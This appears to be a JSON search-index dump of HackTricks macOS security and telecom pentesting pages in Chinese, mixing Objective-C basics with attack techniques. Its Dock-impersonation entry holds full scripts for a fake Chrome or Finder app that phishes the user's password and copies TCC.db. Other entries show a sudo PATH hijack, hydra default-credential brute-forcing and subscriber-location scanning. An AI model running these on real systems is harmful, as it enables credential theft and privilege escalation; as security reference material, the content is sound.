NSMutableString *mutableString = [NSMutableString stringWithString:@\\"The book \\"];\\n[mutableString appendString:bookTitle];\\n[mutableString appendString:@\\" was written by \\"];\\n[mutableString appendString:bookAuthor];\\n[mutableString appendString:@\\" and published in \\"];\\n[mutableString appendString:bookPublicationYear]; 数字 objectivec // character literals.\\nNSNumber *theLetterZ = @\'Z\'; // equivalent to [NSNumber numberWithChar:\'Z\'] // integral literals.\\nNSNumber *fortyTwo = @42; // equivalent to [NSNumber numberWithInt:42]\\nNSNumber *fortyTwoUnsigned = @42U; // equivalent to [NSNumber numberWithUnsignedInt:42U]\\nNSNumber *fortyTwoLong = @42L; // equivalent to [NSNumber numberWithLong:42L]\\nNSNumber *fortyTwoLongLong = @42LL; // equivalent to [NSNumber numberWithLongLong:42LL] // floating point literals.\\nNSNumber *piFloat = @3.141592654F; // equivalent to [NSNumber numberWithFloat:3.141592654F]\\nNSNumber *piDouble = @3.1415926535; // equivalent to [NSNumber numberWithDouble:3.1415926535] // BOOL literals.\\nNSNumber *yesNumber = @YES; // equivalent to [NSNumber numberWithBool:YES]\\nNSNumber *noNumber = @NO; // equivalent to [NSNumber numberWithBool:NO] 数组、集合和字典 objectivec // Inmutable arrays\\nNSArray *colorsArray1 = [NSArray arrayWithObjects:@\\"red\\", @\\"green\\", @\\"blue\\", nil];\\nNSArray *colorsArray2 = @[@\\"yellow\\", @\\"cyan\\", @\\"magenta\\"];\\nNSArray *colorsArray3 = @[firstColor, secondColor, thirdColor]; // Mutable arrays\\nNSMutableArray *mutColorsArray = [NSMutableArray array];\\n[mutColorsArray addObject:@\\"red\\"];\\n[mutColorsArray addObject:@\\"green\\"];\\n[mutColorsArray addObject:@\\"blue\\"];\\n[mutColorsArray addObject:@\\"yellow\\"];\\n[mutColorsArray replaceObjectAtIndex:0 withObject:@\\"purple\\"]; // Inmutable Sets\\nNSSet *fruitsSet1 = [NSSet setWithObjects:@\\"apple\\", @\\"banana\\", @\\"orange\\", nil];\\nNSSet *fruitsSet2 = [NSSet setWithArray:@[@\\"apple\\", @\\"banana\\", @\\"orange\\"]]; // Mutable sets\\nNSMutableSet *mutFruitsSet = [NSMutableSet setWithObjects:@\\"apple\\", @\\"banana\\", @\\"orange\\", nil];\\n[mutFruitsSet addObject:@\\"grape\\"];\\n[mutFruitsSet removeObject:@\\"apple\\"]; // Dictionary\\nNSDictionary *fruitColorsDictionary = @{\\n@\\"apple\\" : @\\"red\\",\\n@\\"banana\\" : @\\"yellow\\",\\n@\\"orange\\" : @\\"orange\\",\\n@\\"grape\\" : @\\"purple\\"\\n}; // In dictionaryWithObjectsAndKeys you specify the value and then the key:\\nNSDictionary *fruitColorsDictionary2 = [NSDictionary dictionaryWithObjectsAndKeys:\\n@\\"red\\", @\\"apple\\",\\n@\\"yellow\\", @\\"banana\\",\\n@\\"orange\\", @\\"orange\\",\\n@\\"purple\\", @\\"grape\\",\\nnil]; // Mutable dictionary\\nNSMutableDictionary *mutFruitColorsDictionary = [NSMutableDictionary dictionaryWithDictionary:fruitColorsDictionary];\\n[mutFruitColorsDictionary setObject:@\\"green\\" forKey:@\\"apple\\"];\\n[mutFruitColorsDictionary removeObjectForKey:@\\"grape\\"];","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 基本类","id":"2315","title":"基本类"},"2316":{"body":"Blocks 是 作为对象行为的函数 ,因此可以传递给函数或 存储 在 数组 或 字典 中。此外,如果给定值,它们可以 表示一个值 ,因此类似于 lambdas。 objectivec returnType (^blockName)(argumentType1, argumentType2, ...) = ^(argumentType1 param1, argumentType2 param2, ...){\\n//Perform operations here\\n}; // For example int (^suma)(int, int) = ^(int a, int b){\\nreturn a+b;\\n};\\nNSLog(@\\"3+4 = %d\\", suma(3,4)); 也可以 定义一个块类型作为函数中的参数 : objectivec // Define the block type\\ntypedef void (^callbackLogger)(void); // Create a bloack with the block type\\ncallbackLogger myLogger = ^{\\nNSLog(@\\"%@\\", @\\"This is my block\\");\\n}; // Use it inside a function as a param\\nvoid genericLogger(callbackLogger blockParam) {\\nNSLog(@\\"%@\\", @\\"This is my function\\");\\nblockParam();\\n}\\ngenericLogger(myLogger); // Call it inline\\ngenericLogger(^{\\nNSLog(@\\"%@\\", @\\"This is my second block\\");\\n});","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » Blocks","id":"2316","title":"Blocks"},"2317":{"body":"objectivec // Manager to manage files\\nNSFileManager *fileManager = [NSFileManager defaultManager]; // Check if file exists:\\nif ([fileManager fileExistsAtPath:@\\"/path/to/file.txt\\" ] == YES) {\\nNSLog (@\\"File exists\\");\\n} // copy files\\nif ([fileManager copyItemAtPath: @\\"/path/to/file1.txt\\" toPath: @\\"/path/to/file2.txt\\" error:nil] == YES) {\\nNSLog (@\\"Copy successful\\");\\n} // Check if the content of 2 files match\\nif ([fileManager contentsEqualAtPath:@\\"/path/to/file1.txt\\" andPath:@\\"/path/to/file2.txt\\"] == YES) {\\nNSLog (@\\"File contents match\\");\\n} // Delete file\\nif ([fileManager removeItemAtPath:@\\"/path/to/file1.txt\\" error:nil]) {\\nNSLog(@\\"Removed successfully\\");\\n} 也可以使用 NSURL 对象而不是 NSString 对象 来管理文件。方法名称类似,但 使用 URL 而不是 Path 。 objectivec tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 文件","id":"2317","title":"文件"},"2318":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » macOS 提权","id":"2318","title":"macOS 提权"},"2319":{"body":"如果你来这里寻找 TCC 提权,请访问: macOS TCC","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » TCC 提权","id":"2319","title":"TCC 提权"},"232":{"body":"大量厂商的网络设备出厂时包含硬编码的 SSH/Telnet 用户,例如 root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, …。专门的 wordlist 会显著提升 brute-force 成功率: bash hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt 如果设备仅暴露管理 VRF,请先通过 jump host 进行 pivot(参见下面的 «SGSN Emu Tunnel» 部分)。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 1.1 默认 OSS / NE 帐户","id":"232","title":"1.1 默认 OSS / NE 帐户"},"2320":{"body":"请注意, 大多数影响 Linux/Unix 的提权技巧也会影响 MacOS 机器。因此请查看: Linux Privilege Escalation","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » Linux 提权","id":"2320","title":"Linux 提权"},"2321":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » 用户交互","id":"2321","title":"用户交互"},"2322":{"body":"你可以在 Linux 提权文章中找到原始的 Sudo 劫持技巧 。 然而,macOS 保持 用户的 PATH 当他执行 sudo 时。这意味着实现此攻击的另一种方法是 劫持其他二进制文件 ,这些文件是受害者在 运行 sudo 时仍会执行的: bash # Let\'s hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH\\ncat > /opt/homebrew/bin/ls < /tmp/privesc\\nfi\\n/bin/ls \\"\\\\$@\\"\\nEOF\\nchmod +x /opt/homebrew/bin/ls # victim\\nsudo ls 注意,使用终端的用户很可能已经 安装了 Homebrew 。因此,可以劫持**/opt/homebrew/bin**中的二进制文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » Sudo 劫持","id":"2322","title":"Sudo 劫持"},"2323":{"body":"通过一些 社会工程 ,你可以在 Dock 中 冒充例如 Google Chrome ,并实际执行你自己的脚本: Chrome Impersonation\\nFinder Impersonation 一些建议: 在 Dock 中检查是否有 Chrome,如果有, 删除 该条目,并在 Dock 数组的相同位置 添加****假冒 的 Chrome条目 。 bash #!/bin/sh # THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)\\n# If you want to removed granted TCC permissions: > delete from access where client LIKE \'%Chrome%\'; rm -rf /tmp/Google\\\\ Chrome.app/ 2>/dev/null # Create App structure\\nmkdir -p /tmp/Google\\\\ Chrome.app/Contents/MacOS\\nmkdir -p /tmp/Google\\\\ Chrome.app/Contents/Resources # Payload to execute\\ncat > /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome.c <\\n#include \\n#include int main() {\\nchar *cmd = \\"open /Applications/Google\\\\\\\\\\\\\\\\ Chrome.app & \\"\\n\\"sleep 2; \\"\\n\\"osascript -e \'tell application \\\\\\"Finder\\\\\\"\' -e \'set homeFolder to path to home folder as string\' -e \'set sourceFile to POSIX file \\\\\\"/Library/Application Support/com.apple.TCC/TCC.db\\\\\\" as alias\' -e \'set targetFolder to POSIX file \\\\\\"/tmp\\\\\\" as alias\' -e \'duplicate file sourceFile to targetFolder with replacing\' -e \'end tell\'; \\"\\n\\"PASSWORD=\\\\$(osascript -e \'Tell application \\\\\\"Finder\\\\\\"\' -e \'Activate\' -e \'set userPassword to text returned of (display dialog \\\\\\"Enter your password to update Google Chrome:\\\\\\" default answer \\\\\\"\\\\\\" with hidden answer buttons {\\\\\\"OK\\\\\\"} default button 1 with icon file \\\\\\"Applications:Google Chrome.app:Contents:Resources:app.icns\\\\\\")\' -e \'end tell\' -e \'return userPassword\'); \\"\\n\\"echo \\\\$PASSWORD > /tmp/passwd.txt\\";\\nsystem(cmd);\\nreturn 0;\\n}\\nEOF gcc /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome.c -o /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome\\nrm -rf /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome.c chmod +x /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome # Info.plist\\ncat << EOF > /tmp/Google\\\\ Chrome.app/Contents/Info.plist\\n\\n\\n\\n\\nCFBundleExecutable\\nGoogle Chrome\\nCFBundleIdentifier\\ncom.google.Chrome\\nCFBundleName\\nGoogle Chrome\\nCFBundleVersion\\n1.0\\nCFBundleShortVersionString\\n1.0\\nCFBundleInfoDictionaryVersion\\n6.0\\nCFBundlePackageType\\nAPPL\\nCFBundleIconFile\\napp\\n\\n\\nEOF # Copy icon from Google Chrome\\ncp /Applications/Google\\\\ Chrome.app/Contents/Resources/app.icns /tmp/Google\\\\ Chrome.app/Contents/Resources/app.icns # Add to Dock\\ndefaults write com.apple.dock persistent-apps -array-add \'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0\'\\nsleep 0.1\\nkillall Dock 一些建议: 你 无法从 Dock 中移除 Finder ,所以如果你要将其添加到 Dock 中,可以将假 Finder 放在真实 Finder 旁边。为此,你需要 将假 Finder 条目添加到 Dock 数组的开头 。 另一个选项是不要将其放在 Dock 中,只需打开它,“Finder 请求控制 Finder”并不奇怪。 另一个选项是 在不询问 密码的情况下提升到 root 权限,使用一个可怕的框,实际上让 Finder 请求密码以执行特权操作: 请求 Finder 将一个新的 sudo 文件复制到 /etc/pam.d (提示请求密码将指示“Finder 想要复制 sudo”) 请求 Finder 复制一个新的 Authorization Plugin (你可以控制文件名,以便提示请求密码将指示“Finder 想要复制 Finder.bundle”) bash #!/bin/sh # THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)\\n# If you want to removed granted TCC permissions: > delete from access where client LIKE \'%finder%\'; rm -rf /tmp/Finder.app/ 2>/dev/null # Create App structure\\nmkdir -p /tmp/Finder.app/Contents/MacOS\\nmkdir -p /tmp/Finder.app/Contents/Resources # Payload to execute\\ncat > /tmp/Finder.app/Contents/MacOS/Finder.c <\\n#include \\n#include int main() {\\nchar *cmd = \\"open /System/Library/CoreServices/Finder.app & \\"\\n\\"sleep 2; \\"\\n\\"osascript -e \'tell application \\\\\\"Finder\\\\\\"\' -e \'set homeFolder to path to home folder as string\' -e \'set sourceFile to POSIX file \\\\\\"/Library/Application Support/com.apple.TCC/TCC.db\\\\\\" as alias\' -e \'set targetFolder to POSIX file \\\\\\"/tmp\\\\\\" as alias\' -e \'duplicate file sourceFile to targetFolder with replacing\' -e \'end tell\'; \\"\\n\\"PASSWORD=\\\\$(osascript -e \'Tell application \\\\\\"Finder\\\\\\"\' -e \'Activate\' -e \'set userPassword to text returned of (display dialog \\\\\\"Finder needs to update some components. Enter your password:\\\\\\" default answer \\\\\\"\\\\\\" with hidden answer buttons {\\\\\\"OK\\\\\\"} default button 1 with icon file \\\\\\"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\\\\\\")\' -e \'end tell\' -e \'return userPassword\'); \\"\\n\\"echo \\\\$PASSWORD > /tmp/passwd.txt\\";\\nsystem(cmd);\\nreturn 0;\\n}\\nEOF gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder\\nrm -rf /tmp/Finder.app/Contents/MacOS/Finder.c chmod +x /tmp/Finder.app/Contents/MacOS/Finder # Info.plist\\ncat << EOF > /tmp/Finder.app/Contents/Info.plist\\n\\n\\n\\n\\nCFBundleExecutable\\nFinder\\nCFBundleIdentifier\\ncom.apple.finder\\nCFBundleName\\nFinder\\nCFBundleVersion\\n1.0\\nCFBundleShortVersionString\\n1.0\\nCFBundleInfoDictionaryVersion\\n6.0\\nCFBundlePackageType\\nAPPL\\nCFBundleIconFile\\napp\\n\\n\\nEOF # Copy icon from Finder\\ncp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns # Add to Dock\\ndefaults write com.apple.dock persistent-apps -array-add \'tile-datafile-data_CFURLString/tmp/Finder.app_CFURLStringType0\'\\nsleep 0.1\\nkillall Dock","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » Dock 冒充","id":"2323","title":"Dock 冒充"},"2324":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » TCC - Root 权限提升","id":"2324","title":"TCC - Root 权限提升"},"2325":{"body":"任何用户 (甚至是无特权用户)都可以创建并挂载时间机器快照,并 访问该快照的所有文件 。 所需的 唯一特权 是用于访问的应用程序(如 Terminal)必须具有 完全磁盘访问 (FDA)权限(kTCCServiceSystemPolicyAllfiles),该权限需要由管理员授予。 bash # Create snapshot\\ntmutil localsnapshot # List snapshots\\ntmutil listlocalsnapshots /\\nSnapshots for disk /:\\ncom.apple.TimeMachine.2023-05-29-001751.local # Generate folder to mount it\\ncd /tmp # I didn it from this folder\\nmkdir /tmp/snap # Mount it, \\"noowners\\" will mount the folder so the current user can access everything\\n/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap # Access it\\nls /tmp/snap/Users/admin_user # This will work 更详细的解释可以在 原始报告中找到 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » CVE-2020-9771 - mount_apfs TCC 绕过和权限提升","id":"2325","title":"CVE-2020-9771 - mount_apfs TCC 绕过和权限提升"},"2326":{"body":"这可以用于提升权限: macOS Sensitive Locations & Interesting Daemons tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » 敏感信息","id":"2326","title":"敏感信息"},"2327":{"body":"Reading time: 21 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS 进程滥用","id":"2327","title":"macOS 进程滥用"},"2328":{"body":"进程是正在运行的可执行文件的实例,但进程并不运行代码,这些是线程。因此, 进程只是运行线程的容器 ,提供内存、描述符、端口、权限等... 传统上,进程是在其他进程中启动的(除了 PID 1),通过调用 fork 创建当前进程的精确副本,然后 子进程 通常会调用 execve 来加载新的可执行文件并运行它。随后,引入了 vfork 以加快此过程而无需任何内存复制。 然后引入了 posix_spawn ,将 vfork 和 execve 结合在一个调用中,并接受标志: POSIX_SPAWN_RESETIDS: 将有效 ID 重置为真实 ID POSIX_SPAWN_SETPGROUP: 设置进程组归属 POSUX_SPAWN_SETSIGDEF: 设置信号默认行为 POSIX_SPAWN_SETSIGMASK: 设置信号掩码 POSIX_SPAWN_SETEXEC: 在同一进程中执行(类似于 execve,但有更多选项) POSIX_SPAWN_START_SUSPENDED: 启动时挂起 _POSIX_SPAWN_DISABLE_ASLR: 无 ASLR 启动 _POSIX_SPAWN_NANO_ALLOCATOR: 使用 libmalloc 的 Nano 分配器 _POSIX_SPAWN_ALLOW_DATA_EXEC: 允许数据段上的 rwx POSIX_SPAWN_CLOEXEC_DEFAULT: 默认情况下在 exec(2) 时关闭所有文件描述符 _POSIX_SPAWN_HIGH_BITS_ASLR: 随机化 ASLR 滑动的高位 此外,posix_spawn 允许指定一个 posix_spawnattr 数组,以控制生成进程的某些方面,以及 posix_spawn_file_actions 来修改描述符的状态。 当进程终止时,它会向 父进程发送返回代码 (如果父进程已终止,则新父进程为 PID 1),并发送信号 SIGCHLD。父进程需要通过调用 wait4() 或 waitid() 来获取此值,直到那时,子进程保持在僵尸状态,仍然被列出但不消耗资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 进程基本信息","id":"2328","title":"进程基本信息"},"2329":{"body":"PID,进程标识符,标识一个唯一的进程。在 XNU 中, PIDs 是 64 位 ,单调递增且 永不回绕 (以避免滥用)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » PIDs","id":"2329","title":"PIDs"},"233":{"body":"大多数 GRX 运营商仍然允许在骨干网络上使用 ICMP echo 。将 masscan 与内置的 gtpv1 UDP 探针结合使用,以快速映射 GTP-C 侦听器: bash masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 1.2 GRX/IPX 内的主机发现","id":"233","title":"1.2 GRX/IPX 内的主机发现"},"2330":{"body":"进程 可以被插入到 组 中,以便更容易处理。例如,shell 脚本中的命令将处于同一进程组中,因此可以使用 kill 等方式 一起发送信号 。 也可以 将进程分组到会话中 。当进程启动会话(setsid(2))时,子进程被设置在会话内,除非它们启动自己的会话。 联盟是 Darwin 中另一种分组进程的方式。加入联盟的进程可以访问池资源,共享账本或面对 Jetsam。联盟有不同的角色:领导者、XPC 服务、扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 进程组、会话与联盟","id":"2330","title":"进程组、会话与联盟"},"2331":{"body":"每个进程持有 凭证 ,以 识别其在系统中的权限 。每个进程将有一个主要的 uid 和一个主要的 gid(尽管可能属于多个组)。 如果二进制文件具有 setuid/setgid 位,也可以更改用户和组 ID。 有几个函数可以 设置新的 uids/gids 。 系统调用 persona 提供了一组 替代 的 凭证 。采用一个角色会同时假定其 uid、gid 和组成员资格。在 源代码 中可以找到该结构: c struct kpersona_info { uint32_t persona_info_version;\\nuid_t persona_id; /* overlaps with UID */\\nint persona_type;\\ngid_t persona_gid;\\nuint32_t persona_ngroups;\\ngid_t persona_groups[NGROUPS];\\nuid_t persona_gmuid;\\nchar persona_name[MAXLOGNAME + 1]; /* TODO: MAC policies?! */\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 凭证与角色","id":"2331","title":"凭证与角色"},"2332":{"body":"POSIX 线程 (pthreads): macOS 支持 POSIX 线程 (pthreads),这是 C/C++ 的标准线程 API 的一部分。macOS 中 pthreads 的实现位于 /usr/lib/system/libsystem_pthread.dylib,该库来自公开可用的 libpthread 项目。此库提供创建和管理线程所需的函数。 创建线程: pthread_create() 函数用于创建新线程。在内部,此函数调用 bsdthread_create(),这是一个特定于 XNU 内核的低级系统调用(macOS 基于的内核)。此系统调用接受来自 pthread_attr(属性)的各种标志,这些标志指定线程行为,包括调度策略和堆栈大小。 默认堆栈大小: 新线程的默认堆栈大小为 512 KB,足以满足典型操作,但如果需要更多或更少的空间,可以通过线程属性进行调整。 线程初始化: __pthread_init() 函数在线程设置过程中至关重要,利用 env[] 参数解析环境变量,这些变量可以包含有关堆栈位置和大小的详细信息。 macOS 中的线程终止 退出线程: 线程通常通过调用 pthread_exit() 来终止。此函数允许线程干净地退出,执行必要的清理,并允许线程将返回值发送回任何加入者。 线程清理: 调用 pthread_exit() 后,将调用 pthread_terminate() 函数,该函数处理所有相关线程结构的移除。它会释放 Mach 线程端口(Mach 是 XNU 内核中的通信子系统),并调用 bsdthread_terminate,这是一个移除与线程相关的内核级结构的系统调用。 同步机制 为了管理对共享资源的访问并避免竞争条件,macOS 提供了几种同步原语。这些在多线程环境中至关重要,以确保数据完整性和系统稳定性: 互斥锁: 常规互斥锁 (签名: 0x4D555458): 标准互斥锁,内存占用为 60 字节(互斥锁 56 字节,签名 4 字节)。 快速互斥锁 (签名: 0x4d55545A): 类似于常规互斥锁,但针对更快的操作进行了优化,大小也为 60 字节。 条件变量: 用于等待某些条件的发生,大小为 44 字节(40 字节加 4 字节签名)。 条件变量属性 (签名: 0x434e4441): 条件变量的配置属性,大小为 12 字节。 一次变量 (签名: 0x4f4e4345): 确保一段初始化代码仅执行一次。其大小为 12 字节。 读写锁: 允许多个读者或一个写者同时访问,促进对共享数据的高效访问。 读写锁 (签名: 0x52574c4b): 大小为 196 字节。 读写锁属性 (签名: 0x52574c41): 读写锁的属性,大小为 20 字节。 tip 这些对象的最后 4 字节用于检测溢出。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 线程基本信息","id":"2332","title":"线程基本信息"},"2333":{"body":"线程局部变量 (TLV) 在 Mach-O 文件(macOS 中可执行文件的格式)的上下文中用于声明特定于 每个线程 的变量,以便在多线程应用程序中使用。这确保每个线程都有自己单独的变量实例,从而提供了一种避免冲突和维护数据完整性的方法,而无需像互斥锁那样的显式同步机制。 在 C 及相关语言中,可以使用 __thread 关键字声明线程局部变量。以下是您示例中的工作原理: c cCopy code__thread int tlv_var; void main (int argc, char **argv){\\ntlv_var = 10;\\n} 这个片段将 tlv_var 定义为线程局部变量。每个运行此代码的线程将拥有自己的 tlv_var,一个线程对 tlv_var 的更改不会影响另一个线程中的 tlv_var。 在 Mach-O 二进制文件中,与线程局部变量相关的数据被组织成特定的部分: __DATA.__thread_vars : 此部分包含有关线程局部变量的元数据,如它们的类型和初始化状态。 __DATA.__thread_bss : 此部分用于未显式初始化的线程局部变量。它是为零初始化数据保留的内存的一部分。 Mach-O 还提供了一个特定的 API,称为 tlv_atexit ,用于管理线程退出时的线程局部变量。此 API 允许您 注册析构函数 ——在线程终止时清理线程局部数据的特殊函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 线程局部变量 (TLV)","id":"2333","title":"线程局部变量 (TLV)"},"2334":{"body":"理解线程优先级涉及查看操作系统如何决定哪些线程运行以及何时运行。这个决定受到分配给每个线程的优先级级别的影响。在 macOS 和类 Unix 系统中,这通过 nice、renice 和服务质量 (QoS) 类等概念来处理。 Nice 和 Renice Nice: 进程的 nice 值是一个影响其优先级的数字。每个进程的 nice 值范围从 -20(最高优先级)到 19(最低优先级)。进程创建时的默认 nice 值通常为 0。 较低的 nice 值(接近 -20)使进程更“自私”,相对于其他具有较高 nice 值的进程,给予其更多的 CPU 时间。 Renice: renice 是一个用于更改已运行进程的 nice 值的命令。这可以用于动态调整进程的优先级,基于新的 nice 值增加或减少其 CPU 时间分配。 例如,如果一个进程暂时需要更多的 CPU 资源,您可能会使用 renice 降低其 nice 值。 服务质量 (QoS) 类 QoS 类是处理线程优先级的更现代的方法,特别是在支持 Grand Central Dispatch (GCD) 的系统中。QoS 类允许开发人员根据任务的重要性或紧急性将工作 分类 为不同级别。macOS 根据这些 QoS 类自动管理线程优先级: 用户交互: 此类用于当前与用户交互或需要立即结果以提供良好用户体验的任务。这些任务被赋予最高优先级,以保持界面的响应性(例如,动画或事件处理)。 用户启动: 用户启动并期望立即结果的任务,例如打开文档或单击需要计算的按钮。这些任务优先级高,但低于用户交互。 实用程序: 这些任务是长时间运行的,通常显示进度指示器(例如,下载文件、导入数据)。它们的优先级低于用户启动的任务,不需要立即完成。 后台: 此类用于在后台运行且对用户不可见的任务。这些可以是索引、同步或备份等任务。它们的优先级最低,对系统性能的影响最小。 使用 QoS 类,开发人员不需要管理确切的优先级数字,而是专注于任务的性质,系统会相应地优化 CPU 资源。 此外,还有不同的 线程调度策略 ,用于指定调度程序将考虑的一组调度参数。这可以通过 thread_policy_[set/get] 来完成。这在竞争条件攻击中可能会很有用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 线程优先级","id":"2334","title":"线程优先级"},"2335":{"body":"MacOS 像其他操作系统一样,提供多种方法和机制供 进程交互、通信和共享数据 。虽然这些技术对于高效的系统功能至关重要,但也可能被威胁行为者滥用以 执行恶意活动 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » MacOS 进程滥用","id":"2335","title":"MacOS 进程滥用"},"2336":{"body":"库注入是一种技术,攻击者 强制进程加载恶意库 。一旦注入,库将在目标进程的上下文中运行,攻击者将获得与该进程相同的权限和访问权限。 macOS Library Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 库注入","id":"2336","title":"库注入"},"2337":{"body":"函数钩子涉及 拦截软件代码中的函数调用 或消息。通过钩住函数,攻击者可以 修改进程的行为 、观察敏感数据,甚至控制执行流程。 macOS Function Hooking","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 函数钩子","id":"2337","title":"函数钩子"},"2338":{"body":"进程间通信 (IPC) 指的是不同进程 共享和交换数据 的不同方法。虽然 IPC 对许多合法应用程序至关重要,但也可能被滥用以破坏进程隔离、泄露敏感信息或执行未经授权的操作。 macOS IPC - Inter Process Communication","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 进程间通信","id":"2338","title":"进程间通信"},"2339":{"body":"使用特定环境变量执行的 Electron 应用程序可能会受到进程注入的影响: macOS Electron Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Electron 应用程序注入","id":"2339","title":"Electron 应用程序注入"},"234":{"body":"下面的 Go 工具构造 GTP-C Create PDP Context Request 数据包并记录响应。每个回复会显示当前为所查询的 IMSI 提供服务的 SGSN / MME ,有时还会显示该订户访问的 PLMN。 bash # Build\\nGOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan # Usage (typical):\\n./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap 主要标志: --imsi 目标订户 IMSI --oper 归属网络 / HNI (MCC+MNC) -w 将原始数据包写入 pcap 二进制文件中的重要常量可以被修改以扩大扫描范围: pingtimeout = 3 // seconds before giving up\\npco = 0x218080\\ncommon_tcp_ports = \\"22,23,80,443,8080\\"","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 2. 枚举订户 – cordscan","id":"234","title":"2. 枚举订户 – cordscan"},"2340":{"body":"可以使用 --load-extension 和 --use-fake-ui-for-media-stream 标志执行 浏览器中的人攻击 ,从而窃取击键、流量、cookie,在页面中注入脚本...: macOS Chromium Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Chromium 注入","id":"2340","title":"Chromium 注入"},"2341":{"body":"NIB 文件 定义用户界面 (UI) 元素 及其在应用程序中的交互。然而,它们可以 执行任意命令 ,而且 Gatekeeper 不会阻止 已执行的应用程序在 NIB 文件被修改 后再次执行。因此,它们可以用于使任意程序执行任意命令: macOS Dirty NIB","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 脏 NIB","id":"2341","title":"脏 NIB"},"2342":{"body":"可以滥用某些 Java 功能(如 _JAVA_OPTS 环境变量)使 Java 应用程序执行 任意代码/命令 。 macOS Java Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Java 应用程序注入","id":"2342","title":"Java 应用程序注入"},"2343":{"body":"可以通过 滥用 .Net 调试功能 (未受 macOS 保护,如运行时强化)向 .Net 应用程序注入代码。 macOS .Net Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » .Net 